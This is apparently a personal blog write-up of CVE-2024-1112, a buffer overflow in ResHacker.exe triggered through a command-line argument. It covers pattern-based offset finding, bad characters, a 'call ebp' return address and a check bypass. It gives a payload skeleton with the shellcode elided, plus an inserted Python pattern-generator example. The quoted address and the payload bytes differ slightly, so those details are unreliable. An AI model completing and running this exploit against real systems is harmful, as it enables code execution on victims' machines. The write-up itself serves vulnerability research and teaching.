CVE-2024-1112

Exploit_101
Exploitation: honestly, I was running away from this side of reversing. It's like a curse; sooner or later every reverse engineering researcher ends up here, it is inevitable.
Also I wanted to diversify my blog : ))
CVE-2024-1112 is a heap-based buffer overflow, but when this vulnerability was first published it was described as SEH based…

If you want to test it, here is the product and version. You can find it on my GitHub.
Entrance
I couldn’t find any PoC, but some articles mentioned that it is caused by a command line parameter. So first of all we need to generate a buffer overflow pattern. PatternGenerator
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3
Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7
Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2A
If you look at the pattern a little closer, you will notice that no 4-byte sequence occurs twice. So if we see 4 bytes of our parameter anywhere, we can determine exactly where the overflow is.
Debugger Command line -> ResHacker.exe [pattern]
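The pattern step above is the standard crash-triage trick of feeding a non-repeating cyclic pattern and then looking up where the 4 bytes that landed in a register sit inside it. As an added example (not the post's own code, and not the PatternGenerator the author used), here is a small Python reimplementation of the Metasploit-style "Aa0Aa1…" generator together with the offset lookup and a check of the uniqueness property the paragraph relies on. The register value 0x41366341 used in the comment is a constructed sample, not one from the post.

```python
import string
import struct

# The classic pattern: for each UPPER/lower/digit triple emit e.g. "Aa0", "Aa1", ...
# 26 * 26 * 10 triples = 20280 bytes before any 4-byte window could repeat.
MAX_UNIQUE_LEN = 26 * 26 * 10 * 3


def pattern_create(length):
    """Return the first `length` bytes of the cyclic pattern."""
    if length > MAX_UNIQUE_LEN:
        raise ValueError("requested length exceeds the 20280-byte unique pattern")
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += f"{upper}{lower}{digit}".encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(needle, length=MAX_UNIQUE_LEN):
    """Locate a 4-byte fragment inside the pattern.

    `needle` is either the raw bytes as they appear in memory (b"0Aj1") or an
    int copied from a 32-bit register dump; the int is unpacked little-endian
    because that is how x86 stores a dword that was read from the buffer.
    """
    if isinstance(needle, int):
        needle = struct.pack("<I", needle)
    idx = pattern_create(length).find(needle)
    if idx < 0:
        raise ValueError("fragment not found in pattern")
    return idx


def all_windows_unique(pat, width=4):
    """Verify the property the write-up depends on: every `width`-byte window is distinct."""
    seen = set()
    for i in range(len(pat) - width + 1):
        window = pat[i:i + width]
        if window in seen:
            return False
        seen.add(window)
    return True


if __name__ == "__main__":
    full = pattern_create(MAX_UNIQUE_LEN)
    print("all 4-byte windows unique:", all_windows_unique(full))
    # Constructed sample: a register showing 0x41366341 holds the bytes "Ac6A".
    print("offset of 0x41366341:", pattern_offset(0x41366341))
```

The returned value is the raw index into the pattern; how many of those bytes the target actually copies before the overwritten slot depends on its own argument handling, which is why the offset is always confirmed in the debugger, as the author does in the next step.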
Overflow

Yup, this is part of our input (0Aj1). So let’s try it: the first 268 bytes will be padding and then we will put an address, one that makes execution land on our shellcode. It may be “jmp esp”, “call ebp” or something like that, because our shellcode is on the stack.

We got some references to “call ebp” (FF D5) but we need to choose carefully, because there is a check on the input value.
BadChar

Look at that small thing, so cute. Values below 0x20 are not allowed as a parameter. So I will choose higher ones for all bytes. Let’s continue with “0x75D15145”, but it can change at every restart; just make sure that the address points to the “ff d5” opcodes.
Check Statement

EAX points to the stack and takes 4 bytes from our parameter’s shellcode part.
268 bytes (padding) + 4 bytes (address) + 20 bytes (shellcode) == 292. 4 bytes!!
The program will take that value and check it for the jump condition.

Here is a problem. EDX contains the opcodes we gave it and it is a reference for this part of the code. It assigns the 4 bytes located 8 bytes behind it to ECX, and ECX is then used as an address inside a .DLL’s address space. Of course it is a violation to write into another program’s address space, so we need to bypass this statement. There is a “JL” condition and if it is taken, we can get away. JL checks “SF”, so if we provide a value which is negative it will set “SF” and the JL branch will be taken.
How we can bypass the statement: we must give such an address that the value 8 bytes behind it is greater than 0x80000000, because after the dec it should be higher than 0x7FFFFFFF. Let’s find it. (0x75CA8D7B)
For now our payload:
padding = 268 * b"A"
jmp = b"\x78\x8D\xCA\x75" # Address placed at the return slot -> CALL EBP
check = 5 * jmp # Only the 4 bytes at offset 292 matter; the rest are filler
shellcode = "...."
Final

The “ret” instruction takes the address from the top of the stack, and now our stack gives us our padding’s last 4 bytes, so we won’t add 268 bytes of padding; 264 will be okay.
Don’t forget the 292nd byte is important, so if we decrease the padding size we need to increase the “check” variable size by exactly the same amount.
Payload:
padding = 264 * b"A"
jmp = b"\x78\x8D\xCA\x75" # Address placed at the return slot -> CALL EBP
check = 6 * jmp # Only the 4 bytes at offset 292 matter; the rest are filler
shellcode = "...."

We are completely locked on target, now just click and enjoy!
NOTE: The address changed because while I was struggling with the program I broke something and restarted everything. Like I said, the address may need to change.
Happy End!

If you have any suggestion to improve this exploit, like giving it a constant address, contact me.
~Something that can be bought is not worth having.
Resource
Only me -> Full code on GitHub

